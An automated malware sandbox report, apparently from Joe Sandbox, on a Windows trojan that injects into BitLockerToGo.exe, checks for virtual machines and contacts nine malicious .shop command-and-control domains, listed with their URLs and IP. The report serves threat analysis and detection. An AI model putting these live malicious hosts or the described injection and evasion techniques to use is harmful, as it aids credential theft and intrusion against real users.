            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A90F05_2_029A90F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029610005_2_02961000
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029670305_2_02967030
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029930245_2_02993024
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298E19C5_2_0298E19C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A97BB5_2_029A97BB
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029687C05_2_029687C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298E7405_2_0298E740
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029637705_2_02963770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029837705_2_02983770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296A4805_2_0296A480
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298E4195_2_0298E419
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029884465_2_02988446
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0297F4675_2_0297F467
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296B4605_2_0296B460
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A05805_2_029A0580
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029985A05_2_029985A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02996A805_2_02996A80
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A7BB05_2_029A7BB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A8BE05_2_029A8BE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A58505_2_029A5850
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029718705_2_02971870
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296A9405_2_0296A940
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298EE865_2_0298EE86
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02967E205_2_02967E20
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02973F865_2_02973F86
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02992FA95_2_02992FA9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296AFD05_2_0296AFD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298BF1C5_2_0298BF1C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0299EF105_2_0299EF10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296BF705_2_0296BF70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02996C905_2_02996C90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A9CF05_2_029A9CF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298ECF45_2_0298ECF4
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A9C005_2_029A9C00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A4D005_2_029A4D00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02969D785_2_02969D78
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0296CAF0 appears 55 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0297D8A0 appears 164 times
            Source: iq2HxA0SLw.exeStatic PE information: Number of sections : 12 > 10
            Source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
            Source: iq2HxA0SLw.exe, 00000000.00000002.1864836224.00007FF6A9EAF000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs iq2HxA0SLw.exe
            Source: iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs iq2HxA0SLw.exe
            Source: iq2HxA0SLw.exeBinary or memory string: OriginalFileName vs iq2HxA0SLw.exe
            Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@2/1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0299FAD0 CoCreateInstance,5_2_0299FAD0
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeFile created: C:\Users\Public\Libraries\faboa.scifJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeFile opened: C:\Windows\system32\74a18233676dde97608ee6471dc0c9b5cb8eb3e6e4c279aabd8f7060ccfe423dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
            Source: iq2HxA0SLw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: iq2HxA0SLw.exeReversingLabs: Detection: 58%
            Source: iq2HxA0SLw.exeString found in binary or memory: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine .localhostwsarecvmsgwsasendmsgIP addressunixpacket netGo = RIPEMD-160ChorasmianDevanagariGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOld_UyghurPhoenicianSaurashtraSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEexecerrdotSYSTEMROOT but have one_outputUSERDOMAINlocal-addrUser-AgentRST_STREAMEND_STREAMSet-Cookie stream=%dset-cookieuser-agentkeep-alive:authorityequivalentHost: %s
            Source: iq2HxA0SLw.exeString found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine RegSetValueExWinternal error.in-addr.arpa.unknown mode: unreachable: /log/filter.go/log/helper.godata truncated
            Source: iq2HxA0SLw.exeString found in binary or memory: ... omitting > closed by </add_dir_header.WithDeadline(<not Stringer>Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMaccept-charsetcontent-length{$} not at endempty wildcardparsing %q: %wNot Acceptableheap_sys_bytesSubConn(id:%d)"OUT_OF_RANGE"ALREADY_EXISTSreserved_rangefield_presenceLoadIconMetricGetStockObjectSetPixelFormatTransparentBltGdiplusStartupActivateActCtxGetLocaleInfoWwglCopyContextwglMakeCurrentPdhAddCounterWDragQueryFileWSHGetFileInfoWClientToScreenCloseClipboardDeferWindowPosDefWindowProcWEmptyClipboardEnableMenuItemGetWindowLongWInvalidateRectNotifyWinEventReleaseCaptureScreenToClientSetWindowLongWTrackPopupMenuUnhookWinEventCloseThemeDataSetWindowThemeGetSystemTimesinvalid kind: \.+*?()|[]{}^$
            Source: iq2HxA0SLw.exeString found in binary or memory: net/addrselect.go
            Source: iq2HxA0SLw.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
            Source: iq2HxA0SLw.exeString found in binary or memory: google.golang.org/grpc@v1.64.1/internal/balancerload/load.go
            Source: iq2HxA0SLw.exeString found in binary or memory: YePeApZaEl/load.go
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeFile read: C:\Users\user\Desktop\iq2HxA0SLw.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\iq2HxA0SLw.exe "C:\Users\user\Desktop\iq2HxA0SLw.exe"
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: iq2HxA0SLw.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: iq2HxA0SLw.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: iq2HxA0SLw.exeStatic file information: File size 19231232 > 1048576
            Source: iq2HxA0SLw.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x65d200
            Source: iq2HxA0SLw.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xb2da00
            Source: iq2HxA0SLw.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
            Source: iq2HxA0SLw.exeStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6336Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
            Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: iq2HxA0SLw.exe, 00000000.00000002.1861210283.0000024538558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_5-19831
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A7130 LdrInitializeThunk,5_2_029A7130

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000 value starts with: 4D5AJump to behavior
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: covvercilverow.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: surroundeocw.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abortinoiwiam.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pumpkinkwquo.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: priooozekw.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deallyharvenw.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: defenddsouneuw.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: racedsuitreow.shop
            Source: iq2HxA0SLw.exe, 00000000.00000003.1821935259.000002457F370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pianoswimen.shop
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000Jump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AA3008Jump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeQueries volume information: C:\Users\user\Desktop\iq2HxA0SLw.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iq2HxA0SLw.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: iq2HxA0SLw.exe, type: SAMPLE
            Source: Yara matchFile source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: iq2HxA0SLw.exe, type: SAMPLE
            Source: Yara matchFile source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            11
            Input Capture
            11
            Security Software Discovery
            Remote Services1
            Screen Capture
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            2
            Virtualization/Sandbox Evasion
            LSASS Memory2
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol11
            Input Capture
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)311
            Process Injection
            Security Account Manager22
            System Information Discovery
            SMB/Windows Admin Shares1
            Archive Collected Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDSSystem Network Configuration DiscoveryDistributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            iq2HxA0SLw.exe58%ReversingLabsWin64.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            priooozekw.shop100%Avira URL Cloudmalware
            https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
            http://crl.m0%Avira URL Cloudsafe
            surroundeocw.shop100%Avira URL Cloudmalware
            https://racedsuitreow.shop/api100%Avira URL Cloudmalware
            https://racedsuitreow.shop/api$&100%Avira URL Cloudmalware
            racedsuitreow.shop100%Avira URL Cloudmalware
            https://racedsuitreow.shop/xy100%Avira URL Cloudmalware
            covvercilverow.shop100%Avira URL Cloudmalware
            pianoswimen.shop100%Avira URL Cloudmalware
            http://www.microsoft.co0%Avira URL Cloudsafe
            https://racedsuitreow.shop/api=100%Avira URL Cloudmalware
            abortinoiwiam.shop100%Avira URL Cloudmalware
            https://github.com/golang/protobuf/issues/1609):0%Avira URL Cloudsafe
            pumpkinkwquo.shop100%Avira URL Cloudmalware
            defenddsouneuw.shop100%Avira URL Cloudmalware
            deallyharvenw.shop100%Avira URL Cloudmalware
            https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            racedsuitreow.shop
            104.21.37.97
            truetrue
              unknown
              pianoswimen.shop
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                priooozekw.shoptrue
                • Avira URL Cloud: malware
                unknown
                https://racedsuitreow.shop/apitrue
                • Avira URL Cloud: malware
                unknown
                surroundeocw.shoptrue
                • Avira URL Cloud: malware
                unknown
                racedsuitreow.shoptrue
                • Avira URL Cloud: malware
                unknown
                pianoswimen.shoptrue
                • Avira URL Cloud: malware
                unknown
                covvercilverow.shoptrue
                • Avira URL Cloud: malware
                unknown
                pumpkinkwquo.shoptrue
                • Avira URL Cloud: malware
                unknown
                abortinoiwiam.shoptrue
                • Avira URL Cloud: malware
                unknown
                deallyharvenw.shoptrue
                • Avira URL Cloud: malware
                unknown
                defenddsouneuw.shoptrue
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://racedsuitreow.shop/xyBitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                http://crl.mBitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://racedsuitreow.shop/api$&BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                http://www.microsoft.coBitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/golang/protobuf/issues/1609):iq2HxA0SLw.exefalse
                • Avira URL Cloud: safe
                unknown
                https://racedsuitreow.shop/api=BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862478504.0000000002F81000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.21.37.97
                racedsuitreow.shopUnited States
                13335CLOUDFLARENETUStrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1519274
                Start date and time:2024-09-26 09:45:15 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 27s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:9
